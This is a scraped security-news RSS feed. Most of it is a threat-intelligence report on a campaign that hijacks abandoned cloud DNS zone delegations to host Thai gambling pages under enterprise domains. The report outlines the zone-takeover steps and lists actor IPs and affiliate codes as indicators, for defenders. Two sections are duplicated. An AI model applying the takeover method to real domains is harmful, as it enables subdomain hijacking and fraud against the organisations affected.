<p>“It feels like a move to keep pressure on Anthropic, especially as Claude Code gains traction with developers and enterprise buyers,” he said. “So I’d read this less as OpenAI taking out a small competitor and more as OpenAI trying to make sure Codex is enterprise-ready before Anthropic gets too far ahead. In the enterprise market, the battle is not just who has the smartest coding model, but who can make AI agents safe and useful enough for big companies to actually deploy.”</p>



<p>He added, “I don’t think this means OpenAI suddenly needs help making Codex better at writing code. The bigger issue is making Codex work inside real enterprise environments, where security, access controls, persistent cloud workspaces, audit trails, and integration with existing developer workflows matter just as much as the model itself. Ona gives OpenAI some of that missing plumbing.”</p>



<p><a href="https://moorinsightsstrategy.com/team/jason-andersen/" target="_blank" rel="noreferrer noopener">Jason Andersen</a>, principal analyst for Moor Insights &amp; Strategy, echoed the concerns about Anthropic.</p>



<p>“To be honest, I think it reinforces what I think, which is that OpenAI and Codex have given a lot of ground to Anthropic and Claude Code, who are winning right now,” he said. “But again, this is not about the market today, I think it’s about how OpenAI will need to position itself as more than just a model as we see the incumbent players, particularly Microsoft, bolster their enterprise coding infrastructure story.”</p>



<p>Andersen said that Moor doesn’t have any strong basis for a guess on the financials, but added, “I am going to assume it was a fairly high multiple, but on a small base. I would not speculate on an amount, but given the enterprise customers that Ona did have, it may be more than we think.”</p>



<p>He also reinforced the idea that OpenAI is going to need help to achieve its own objectives.</p>



<p>“We continue to see that AI adoption is strongest in coding, and other use cases are not as far along,” he said. “So, if you are a general-purpose AI company like OpenAI, you need to double down on development use cases. The meaningful investment and spending on development is happening at the enterprise level, and those customers have more demands for governance, security, etc. than Codex or Claude code can handle.” </p>



<p>That said, he noted, “what you’re seeing is traditional software and cloud plays building out the coding and ops infrastructure around the popular models. That increased competition, while good for selling tokens, is still keeping OpenAI and Anthropic on the outside looking in. So, OpenAI and Anthropic need a stronger enterprise dev story, or they are just another model that could be easily replaced.”</p>



<p><a href="https://www.infotech.com/profiles/jeremy-roberts" target="_blank" rel="noreferrer noopener">Jeremy Roberts</a>, senior director at Info-Tech Research Group, said that he also sees this as likely a good move for OpenAI.</p>



<p>“OpenAI is growing up a little bit,” and they may be falling behind Anthropic, Roberts said. “I see Ona as a boring company, but not in a bad way. They are not flashy, but absolutely necessary.”</p>



<p>Ona is delivering a workspace for Codex that an enterprise can run in its own virtual private cloud, with governance and persistence and an environment where the company can apply their own controls including log management, credential management and resource access, he said. “It is a bucket for the agents to operate in” where IT can “make sure that access is properly credentialed and is controlled effectively to prevent the model doing what it shouldn’t be doing,” which includes managing read/write protections. </p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Over half of Americans fear losing both their jobs and their independent thinking to AI, survey finds]]></title>
<description><![CDATA[Anthropic surveyed nearly 52,000 Americans about their hopes and fears around AI. Sixty-four percent fear job losses, and 56 percent worry about losing the ability to think for themselves. Daily AI users are far less concerned. Still, most people reject AI in their own workplace, even for tasks t...]]></description>
<link>https://tsecurity.de/de/3594359/ai-nachrichten/over-half-of-americans-fear-losing-both-their-jobs-and-their-independent-thinking-to-ai-survey-finds/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594359/ai-nachrichten/over-half-of-americans-fear-losing-both-their-jobs-and-their-independent-thinking-to-ai-survey-finds/</guid>
<pubDate>Fri, 12 Jun 2026 20:58:54 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1088" height="608" src="https://the-decoder.com/wp-content/uploads/2026/06/anthropic_head_pattern.png" class="attachment-full size-full wp-post-image" alt="" decoding="async" fetchpriority="high"></p>
<p>        Anthropic surveyed nearly 52,000 Americans about their hopes and fears around AI. Sixty-four percent fear job losses, and 56 percent worry about losing the ability to think for themselves. Daily AI users are far less concerned. Still, most people reject AI in their own workplace, even for tasks they think it can handle.</p>
<p>The article <a href="https://the-decoder.com/over-half-of-americans-fear-losing-both-their-jobs-and-their-independent-thinking-to-ai-survey-finds/">Over half of Americans fear losing both their jobs and their independent thinking to AI, survey finds</a> appeared first on <a href="https://the-decoder.com/">The Decoder</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ukrainian national pleads guilty to role in Conti ransomware operation]]></title>
<description><![CDATA[A Ukrainian national extradited from Ireland to the United States last year has pleaded guilty to conspiracy charges tied to the Conti ransomware operation. [...]]]></description>
<link>https://tsecurity.de/de/3594257/it-security-nachrichten/ukrainian-national-pleads-guilty-to-role-in-conti-ransomware-operation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594257/it-security-nachrichten/ukrainian-national-pleads-guilty-to-role-in-conti-ransomware-operation/</guid>
<pubDate>Fri, 12 Jun 2026 20:09:08 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A Ukrainian national extradited from Ireland to the United States last year has pleaded guilty to conspiracy charges tied to the Conti ransomware operation. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[Sam Bankman-Fried Loses Bid To Overturn Crypto Fraud Conviction]]></title>
<description><![CDATA[Sam Bankman-Fried lost his appeal to overturn his FTX fraud conviction and 25-year sentence. Reuters reports: In a unanimous decision, a three-judge panel of the Manhattan-based 2nd U.S. Circuit Court of Appeals said prosecutors' evidence against Bankman-Fried "was, conservatively stated, robust....]]></description>
<link>https://tsecurity.de/de/3594223/it-security-nachrichten/sam-bankman-fried-loses-bid-to-overturn-crypto-fraud-conviction/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594223/it-security-nachrichten/sam-bankman-fried-loses-bid-to-overturn-crypto-fraud-conviction/</guid>
<pubDate>Fri, 12 Jun 2026 19:56:53 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Sam Bankman-Fried lost his appeal to overturn his FTX fraud conviction and 25-year sentence. Reuters reports: In a unanimous decision, a three-judge panel of the Manhattan-based 2nd U.S. Circuit Court of Appeals said prosecutors' evidence against Bankman-Fried "was, conservatively stated, robust." "While he was publicly reassuring customers, investors and regulators that FTX customer funds were safe, he was simultaneously using FTX as his own personal piggy bank, spending customer funds on real estate, political contributions, and investments," Circuit Judge Barrington Parker wrote on behalf of the panel.
 
Bankman-Fried's lawyers did not immediately respond to a request for comment. They may next ask all the active judges on the 2nd Circuit to hear the case, or ask the U.S. Supreme Court to take up the case. Bankman-Fried is also seeking a pardon from President Donald Trump, according to the Justice Department's Office of the Pardon Attorney. Bankman-Fried was sentenced to 25 years in prison in 2024 for "masterminding one of the largest financial frauds in American history," wrote US District Judge Lewis Kaplan. He was convicted on all charges, including wire fraud, conspiracy to commit securities fraud, commodities fraud, and money laundering.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Sam+Bankman-Fried+Loses+Bid+To+Overturn+Crypto+Fraud+Conviction%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F12%2F1741212%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F12%2F1741212%2Fsam-bankman-fried-loses-bid-to-overturn-crypto-fraud-conviction%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/06/12/1741212/sam-bankman-fried-loses-bid-to-overturn-crypto-fraud-conviction?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Borrowed Trust – Systematic Exploitation of Abandoned Cloud DNS Delegations to serve Thai Gambling SEO Content]]></title>
<description><![CDATA[Executive Summary




Cyble Research & Intelligence Labs (CRIL) has identified an active SEO poisoning campaign exploiting abandoned cloud DNS zone delegations to serve Thai-language gambling content under the domain authority of reputed enterprise organizations. The campaign has compromised 163 ...]]></description>
<link>https://tsecurity.de/de/3592514/it-security-nachrichten/borrowed-trust-systematic-exploitation-of-abandoned-cloud-dns-delegations-to-serve-thai-gambling-seo-content/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592514/it-security-nachrichten/borrowed-trust-systematic-exploitation-of-abandoned-cloud-dns-delegations-to-serve-thai-gambling-seo-content/</guid>
<pubDate>Fri, 12 Jun 2026 07:38:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1200" height="600" src="https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-2.jpg" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Borrowed Trust, Cyble" decoding="async" srcset="https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-2.jpg 1200w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-2-300x150.jpg 300w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-2-1024x512.jpg 1024w, https://cyble.com/wp-content/uploads/2026/06/Blog-images-Cyble-2-768x384.jpg 768w" sizes="(max-width: 1200px) 100vw, 1200px" title="Borrowed Trust – Systematic Exploitation of Abandoned Cloud DNS Delegations to serve Thai Gambling SEO Content 1"></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Executive Summary</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Cyble Research &amp; Intelligence Labs (CRIL) has identified an active SEO poisoning campaign exploiting abandoned cloud DNS zone delegations to serve Thai-language gambling content under the domain authority of reputed enterprise organizations. The campaign has compromised 163 organizations across 30+ countries, spanning federal government agencies, national healthcare systems, financial institutions, critical infrastructure operators, and major universities.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The primary mechanism is the Azure DNS zone takeover. When enterprises decommission cloud infrastructure, NS delegations to Azure DNS zones are routinely left in place. The actor systematically identifies these abandoned delegations, claims the orphaned zones under a fresh Azure subscription, and deploys a Next.js gambling kit behind a valid Let's Encrypt wildcard TLS certificate, all resolving cleanly under the victim's own domain. A browser, a search engine, and a Thai user following a search result all see a page identical to a legitimate enterprise property.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This report documents the full campaign architecture: the pivot chain from initial discovery through infrastructure attribution, the DNS compromise mechanisms observed, the structured affiliate monetization layer with server-side geographic filtering and dual-tier commission tracking, and a dedicated 103-node application backend in Hong Kong tied to a single Chinese operator by twelve independent technical evidence points. At the time of publication, 161 organizations remain actively compromised.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Initial Discovery</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>During an ongoing vulnerability assessment, CRIL identified an anomalous DNS resolution on the <strong>cardsforheroes.verizon.com</strong> subdomain environment. What initially appeared to be a single misconfigured endpoint turned out to be <strong>1000+</strong> <strong>individually named subdomains</strong>, each serving <strong>Thai-language online gambling</strong> content under <strong>Verizon's trusted domain authority</strong>.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Every subdomain followed a gambling brand keyword pattern with URL-encoded Thai characters confirming the intended audience. All endpoints resolved to a single IP at <strong>OVH SAS (AS16276).</strong> Loading a representative endpoint revealed a fully rendered Next.js gambling application with outbound affiliate redirect links.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>It matched the structural similarity of 97 other enterprise subdomains across completely unrelated organizations. The affiliate referral parameter on every redirect established the monetization intent immediately: this was not defacement or <a href="https://cyble.com/knowledge-hub/what-is-malware/">malware</a> delivery, but a structured operation funneling Thai search traffic to gambling registrations for commission.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Verizon endpoint was not the campaign's origin. Following it, 162 other compromised organizations were exposed.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120442,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/image-4-1024x771.png" alt="Figure 1: Screenshot of the compromised endpoint cod9[.]cardsforheroes[.]Verizon[.]com

Borrowed Trust" class="wp-image-120442"><figcaption class="wp-element-caption">Figure 1: Screenshot of the compromised endpoint cod9[.]cardsforheroes[.]Verizon[.]com</figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Background: The Vulnerability Class</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Cloud infrastructure provisioning introduces a category of DNS misconfiguration that is structurally different from the record-level errors security teams routinely audit. When an enterprise provisions Azure resources for a project environment, a standard step is to delegate a subdomain to an Azure DNS zone by adding NS records in the parent DNS zone that point to Microsoft's nameservers for that environment. The zone lives inside the Azure subscription, the team manages its records there, and the project operates normally.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>"What consistently fails is the decommissioning step. When the project ends, and the Azure resources are deleted, the NS delegation in the parent DNS zone is not usually removed. It persists silently, pointing any DNS query for that subdomain to Azure nameservers that no longer serve authoritative records for it.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>In several cases identified during this investigation, these delegations had been left in place for over six years.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The exploitability of this configuration depends on another condition: whether the Azure DNS zone for that subdomain is claimable by a new subscriber. Microsoft's zone-creation model has historically allowed any subscriber to register a zone by name under their own subscription. A zone abandoned with a canceled subscription can be recreated by a third party, who then inherits the delegated DNS authority that the enterprise's parent zone never revoked.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Our analysis of this campaign demonstrates that awareness has not translated into hygiene at an enterprise scale.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">DNS Compromise Mechanisms</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Four distinct mechanisms account for the 163 confirmed victims. Each exploits the same underlying failure: a DNS delegation that outlived the infrastructure it was created to serve.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120443,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/image-5-1024x683.png" alt="" class="wp-image-120443"></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph {"style":{"typography":{"textAlign":"center"}}} --></p>
<p class="has-text-align-center"></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading">Mechanism 1 — Azure DNS Zone Takeover (150+ Organizations)</h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The actor identifies subdomains whose NS records still point to Azure DNS nameservers, even though the underlying subscription has been canceled or abandoned. A new Azure subscription is created, the orphaned zone is claimed by name, a wildcard A record is added that points all subdomains to a delivery IP, and ACME HTTP-01 validation is performed through the now-controlled DNS to obtain a Let's Encrypt wildcard certificate. One DNS record exposes every possible subdomain of the environment.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Direct authoritative DNS evidence confirms the mechanism. Querying Microsoft's own nameserver infrastructure returns the actor's wildcard A record. Zone SOA serials of 1 on confirmed victims establish that the zones were created from scratch by the actor, not modified from an existing state. Certificate Transparency logs confirm the dormancy periods:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>A major pharmaceutical company's pilot subdomain: last legitimate certificate October 2019, actor certificate April 11, 2026 — a 6.5-year gap</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>A global electronics company's IoT platform: last legitimate certificate February 2023, actor certificate April 10, 2026</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>The bulk of actor-obtained certificates cluster in April 2026, indicating a concentrated automated exploitation window applied across targets abandoned over multiple years.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading">Mechanism 2 — DigitalOcean DNS Zone Takeover (2 Organizations)</h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Two organizations, a US luxury furniture retailer and an Indian university, have their compromised subdomains delegated to DigitalOcean nameservers rather than Azure. Both carry wildcard records resolving to 38.127.8.49.</p>
<p>DigitalOcean's zone-claiming model carries the same structural vulnerability: abandoned DNS zones in canceled accounts become available for re-registration. The actor's tooling targets multiple cloud DNS providers.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading">Mechanism 3 — Direct Wildcard Misconfiguration (2 Organizations)</h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A US energy company's development subdomain and a mobile payments platform's development subdomain both resolve via wildcard to 139.99.82.106, even though there is no cloud DNS zone delegation. Both use their own organizational nameservers, making cloud zone takeover mechanically impossible.</p>
<p>The wildcard records resolve from within the parent zone, indicating either an orphaned wildcard A record left in the organization's own DNS console when a project was decommissioned, or a direct DNS management access path the actor exploited. "A wildcard A record in the DNS console of a payments platform is a more direct access path than a cloud zone takeover.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading">Mechanism 3 — Direct Wildcard Misconfiguration (2 Organizations)</h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A US energy company's development subdomain and a mobile payments platform's development subdomain both resolve via wildcard to 139.99.82.106, even though there is no cloud DNS zone delegation. Both use their own organizational nameservers, making cloud zone takeover mechanically impossible.</p>
<p>The wildcard records resolve from within the parent zone, indicating either an orphaned wildcard A record left in the organization's own DNS console when a project was decommissioned, or a direct DNS management access path the actor exploited. "A wildcard A record in the DNS console of a payments platform is a more direct access path than a cloud zone takeover.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading">Mechanism 4 — Per-Subdomain A Records (1 Organization)</h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Verizon environment represents a distinct approach: 1000+ individually named A records rather than a single wildcard. Each gambling-keyword subdomain is a separately created DNS entry pointing to 51.79.199.51. This implies either an automated DNS API script with zone-write access or a compromised DNS management credential that enabled bulk record creation.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"style":{"typography":{"textAlign":"left"}}} --></p>
<h2 class="wp-block-heading has-text-align-left"><strong>Technical Analysis</strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph {"style":{"typography":{"textAlign":"center"}}} --></p>
<p class="has-text-align-center"><strong>Pivoting: From One Endpoint to 163 Organizations</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120450,"width":"1024px","height":"auto","sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large is-resized"><img src="https://cyble.com/wp-content/uploads/2026/06/image-6-1024x945.png" alt="" class="wp-image-120450"></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Pivot 1: 51.79.199.51 — Primary Delivery Node and First Scope Expansion</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The first pivot came from the primary delivery IP itself. Cross-referencing 51.79.199.51 against passive DNS resolution data and page fingerprint matching returned over 90 enterprise subdomains serving identical content, confirmed by:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Identical Next.js build ID</strong>: QQOrXCFjoI6C9oF-4YVhl</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li><strong>Identical favicon path:</strong> /img/ib99-hq.ico</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Outbound affiliate redirects to the same <strong>three destination domains</strong> across every result</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>Every result was a subdomain of a legitimately owned enterprise domain with a clean reputation. Standard <a href="https://cyble.com/knowledge-hub/what-is-a-threat-intelligence-feed/">threat intelligence feeds</a> returned no signal on any of them. The shared page fingerprint expanded the confirmed victim set from 1 organization to over 90 in a single query.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120457,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/image-18-1024x565.png" alt="" class="wp-image-120457"><figcaption class="wp-element-caption">Figure 2: Thai-language gambling page served from a compromised enterprise subdomain, advertising free credits with no deposit required.</figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Pivot 2: 139.99.82.106 and 38.127.8.49 — Secondary and Tertiary Delivery Nodes</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Passive DNS resolution data against AS16276 (OVH) surfaced two additional delivery IPs operating in parallel. Both served the identical gambling kit with the same build fingerprint across a partially overlapping but distinct victim set. Government agencies, healthcare organizations, and several non-Azure takeover victims routed through these two nodes rather than the primary. Together, the three OVH nodes account for the full 163-organization victim estate. All three presented clean IP reputations, no prior association with threat actors, and standard deployment signatures at the surface level.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120458,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/image-19-1024x565.png" alt="Figure 2: Compromised endpoint pointing to “38[.]127[.]8[.]49”" class="wp-image-120458"><figcaption class="wp-element-caption">Figure 3: Compromised endpoint pointing to “38[.]127[.]8[.]49”</figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Pivot 3: 38.173.56.218 — The JARM Anomaly That Exposed the Backend</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>JARM TLS fingerprinting against the primary delivery node returned thousands of global matches, nearly all of them generic shared hosting providers. One result stood apart by every observable metric: 38.173.56.218 in Hong Kong, AS398478 (PEG TECH INC), presenting:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>A ThinkPHP application framework error on port 443</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>A Chinese server management panel certificate identity on port 21</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>MySQL 5.7.44-log on port 3306</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>Where every other JARM match represented commodity hosting, this node showed a purpose-built application stack managed from mainland China. This was the single point of entry from the OVH delivery layer into the backend infrastructure. Figures 2 and 3 showcase these using findings from <a href="https://odin.io/">ODIN by Cyble</a>.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Affiliate Architecture: How the Campaign Monetizes</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Every destination redirect carries a ?rc= affiliate code — ibiza99vip1, bigwinv1, link99, or seven77vip1 — that attributes completed registrations to the actor and triggers a commission payout from the destination platform. This is standard affiliate marketing infrastructure; legal and illegal gambling operations use it. A server-side layer beneath the visible code separates this campaign from simple redirect farms. A POST request intercepted at a live endpoint returned this before any redirect was issued:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>"<strong>status</strong>": "ok",</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li> "<strong>msg</strong>": "TH - Referrer verified",</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li> "<strong>data</strong>": { "referrer": "link99" },</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li> "<strong>x-token":</strong> ""
</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>The backend validates geographic origin server-side. Requests from outside Thailand are not redirected, keeping traffic focused and limiting scanner exposure. The link99 identifier is a sub-affiliate publisher ID that sits above the ?rc= codes in the platform's tracking hierarchy.</p>
<p>The actor earns at both tiers: publisher-level credit under link99 for delivering Thai traffic, and a per-registration payout under the ?rc= code for each conversion. The two layers are independent — campaign codes can rotate while link99 persists as the actor's permanent platform identity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120466,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/image-8-1024x650.png" alt="Figure 4: 5,547 results matching the JARM hash on ODIN (source: ODIN by Cyble)" class="wp-image-120466"><figcaption class="wp-element-caption">Figure 4: 5,547 results matching the JARM hash on ODIN (source: ODIN by Cyble)</figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Pivoting on the Let's Encrypt certificate presented by this node, issued to broker-xm.com, returned 103 IPs across seven contiguous /24 subnets in 38.173.0.0/16, all within AS398478. A single certificate deployed across 103 servers in a wholesale-allocated IP block produced the complete backend fleet inventory from one certificate query.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120467,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/image-9-1024x573.png" alt="Figure 5: Results for Cert CN-&gt;broker-xm.com showcasing 200 hits from Hong Kong with the IP range 38.173.0.0/16 (source: ODIN by Cyble)" class="wp-image-120467"><figcaption class="wp-element-caption">Figure 5: Results for Cert CN-&gt;broker-xm.com showcasing 200 hits from Hong Kong with the IP range 38.173.0.0/16 (source: ODIN by Cyble)</figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading {"level":4} --></p>
<h4 class="wp-block-heading"><strong>Affiliate Architecture: How the Campaign Monetizes</strong></h4>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Every destination redirect carries a ?rc= affiliate code — ibiza99vip1, bigwinv1, link99, or seven77vip1 — that attributes completed registrations to the actor and triggers a commission payout from the destination platform. This is standard affiliate marketing infrastructure; legal and illegal gambling operations use it. A server-side layer beneath the visible code separates this campaign from simple redirect farms. A POST request intercepted at a live endpoint returned this before any redirect was issued:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>"<strong>status</strong>": "ok",</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li> "<strong>msg</strong>": "TH - Referrer verified",</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li> "<strong>data</strong>": { "referrer": "link99" },</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li> "<strong>x-token":</strong> ""
</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>The backend validates geographic origin server-side. Requests from outside Thailand are not redirected, keeping traffic focused and limiting scanner exposure. The link99 identifier is a sub-affiliate publisher ID that sits above the ?rc= codes in the platform's tracking hierarchy.</p>
<p>The actor earns at both tiers: publisher-level credit under link99 for delivering Thai traffic, and a per-registration payout under the ?rc= code for each conversion. The two layers are independent — campaign codes can rotate while link99 persists as the actor's permanent platform identity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
